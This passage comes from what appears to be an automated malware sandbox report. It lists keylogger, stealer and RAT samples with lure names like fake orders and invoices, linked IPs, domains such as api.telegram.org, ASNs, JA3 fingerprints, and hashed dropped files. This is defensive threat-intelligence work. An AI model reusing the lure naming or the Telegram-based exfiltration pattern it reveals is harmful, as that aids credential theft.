                                                                  Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  149.154.167.220Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                      gem1.exeGet hashmaliciousUnknownBrowse
                                                                        Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                            bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                              PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      reallyfreegeoip.org1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.16.1
                                                                                      Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.16.1
                                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 104.21.64.1
                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.16.1
                                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.96.1
                                                                                      December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.48.1
                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      api.telegram.orgNuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      gem1.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                      • 149.154.167.220
                                                                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      checkip.dyndns.com1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.130.0
                                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 193.122.6.168
                                                                                      December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                      • 193.122.6.168

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUNuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      gem1.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      DyM4yXX.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                      • 149.154.167.220
                                                                                      5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.99
                                                                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      UTMEMUS1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      CLOUDFLARENETUS1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.16.1
                                                                                      0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      • 104.21.38.84
                                                                                      https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 1.1.1.1
                                                                                      drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                      • 172.67.74.152
                                                                                      Fantazy.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                      • 1.3.115.13
                                                                                      https://sora-ai-download.com/Get hashmaliciousUnknownBrowse
                                                                                      • 104.22.20.144
                                                                                      ReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.18.11.207
                                                                                      Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.5.30
                                                                                      ReIayMSG__polarisrx.com_#6577807268.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9ad1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.112.1
                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      3b5074b1b5d032e5620f69f9f700ff0ePO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                      • 149.154.167.220
                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                      • 149.154.167.220
                                                                                      s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                      • 149.154.167.220
                                                                                      chrtrome22.exeGet hashmaliciousXmrigBrowse
                                                                                      • 149.154.167.220
                                                                                      5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3R4NQGPTA05DQTKJ_faaac2fccbefdfd3bb762763acb2229b9dbb1723_114e6520_f8580dcf-b3ae-4c8c-8784-088bea48a214\Report.wer

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.2993816158797127
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:YfK6cgGA0BU/iaWOJoNZrnBaadzuiFcyZ24IO8g:Z6cgKBU/iaxtOzuiFcyY4IO8g
                                                                                      MD5:EEE78626456011ACB596FA732117F36F
                                                                                      SHA1:9B483F2604FFA1B7B914D83CF8600279DD95333C
                                                                                      SHA-256:BEDC3B7C8EBB66C091E27F1695E09E01102DBB2D63CF509A3DD7F5C72C4A588D
                                                                                      SHA-512:D28B2EAA9830BB0D0F64A26F5A6181C81D7A82FD98B59CF6921B9D6279FCABC49AD4082401178F43100DF6B90E522CB357B2C7843D5E558E5153C76933E437DE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.9.1.9.2.6.6.8.8.3.3.5.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.9.1.9.2.6.7.6.1.7.7.0.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.5.8.0.d.c.f.-.b.3.a.e.-.4.c.8.c.-.8.7.8.4.-.0.8.8.b.e.a.4.8.a.2.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.7.1.d.6.2.c.f.-.f.2.0.e.-.4.0.b.1.-.9.b.8.f.-.8.a.5.3.b.e.e.7.8.5.1.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.y.a.t.i._.t.e.k.l.i.f. .6.5.T.B.I.5.0.7._. .O.N.-.S.A.N. .V.a.k.u.m. .s.a.n. .t.i.c._. .S.i.p.a.r.i.#.U.0.1.5.f.i. .j.p.e.g.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.K.x.T.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.4.0.-.0.0.0.1.-.0.0.1.4.-.9.7.d.d.-.4.3.7.3.c.0.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.3.a.b.0.7.8.a.6.d.b.a.6.7.3.f.7.f.d.4.4.2.e.8.4.2.7.c.4.e.b.0.0.0.

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERADDE.tmp.dmp

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Thu Jan 9 18:01:07 2025, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):366941
                                                                                      Entropy (8bit):3.8707612038886268
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:Pgnnt9TkyVGi9pAGkwtV5b4XERlZTgEt4V:Pgnnt9A4Gi9pbF/5WilZTW
                                                                                      MD5:A4110F6F6AE6AB979B27D467F36F61D0
                                                                                      SHA1:A1FEFA5A72BE2793A932EF14533D36A6D52B18E1
                                                                                      SHA-256:8FD6588745134C73DDA6A169FD121F5CEDDB08D7706A346C54C43FAE3C75A02F
                                                                                      SHA-512:B417E8B3CAD78CC57A723BFD9DFFBEAEB07DA492F0A18C71ADE60D3F8E50B486AF83D1BE974143518132B326431990D6512FADCF3DF05D0925ABF1D074D26790
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:MDMP..a..... ..........g............d...........0"..x.......$....,.......5..\o..........`.......8...........T............D...T...........,..........................................................................................eJ......P/......GenuineIntel............T.......@......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFF3.tmp.WERInternalMetadata.xml

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8562
                                                                                      Entropy (8bit):3.713277974606056
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJB+6dYe6YNRSU9xTgmfZZppr189bab+sf/0jm:R6lXJY6L6YbSU9xTgmfnWab9fc6
                                                                                      MD5:58C88947AFCB32290FBC072E514DA67A
                                                                                      SHA1:C35E49978104951186A425B461E4880144261C37
                                                                                      SHA-256:1DDFDB4C53E0F87C72C13C6E58285F71230CC0630CAD3F5752593826A049B3F2
                                                                                      SHA-512:DA4606C4F7AA7C3D398A3E26A0FFB36BD6F307772250615C2507275C1249B1EA94EC60D4680FDD9E458883CD8DC23C7AEBB7BC7F15799576AD2B33EB3C7DB08E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.0.<./.P.i.d.

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB022.tmp.xml

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4947
                                                                                      Entropy (8bit):4.588007449087657
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsCJg77aI9niMyWpW8VYrYm8M4JwNo/Fu+q8vBNo6IDG90dXmd:uIjfQI7wk7V/Jw+UKB+6IC90Bmd
                                                                                      MD5:5B70474081E8716355FD55B354C77E92
                                                                                      SHA1:4066467D97E2E036BD001F6E4FC338F254EF429A
                                                                                      SHA-256:90B3061DD8C63C64EF6EB53554C54B196177186E97881E1568C3ACB43947B11D
                                                                                      SHA-512:462666B2691E52D9D4206DA29503B2D8ECD61BB8F090F4BF4D1344383C0C7AEFCCA1839808F55DE4FDD58F57B384BC35634608787538DE63299ACC7FA50E9DA0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668703" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                      Malicious:true
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1172
                                                                                      Entropy (8bit):5.355024937536926
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:3OWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:eWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                      MD5:A2B58E2A44EE011B5A5204D75F038BDD
                                                                                      SHA1:44E14B097A6F628F0B0663EAA3059B5F0E5D7D8E
                                                                                      SHA-256:397D120EAAD7512D3923B9F86ADA33D54B60CC83655021C674258AA1F2AB68F0
                                                                                      SHA-512:1B27BD34FF787264BAF374DD8F61CAB416FBEE5A8E3D32AC4CF1A8A690D186F22A865D86D55790CEA6D360F4FEF4A55E2742A9EB9CFD1F650BD6B0AC278D621F
                                                                                      Malicious:false
                                                                                      Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jboqdnpm.qai.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvlmjp30.buu.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2sjdfda.ewg.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yk2ebzhs.dms.psm1

                                                                                      Download File
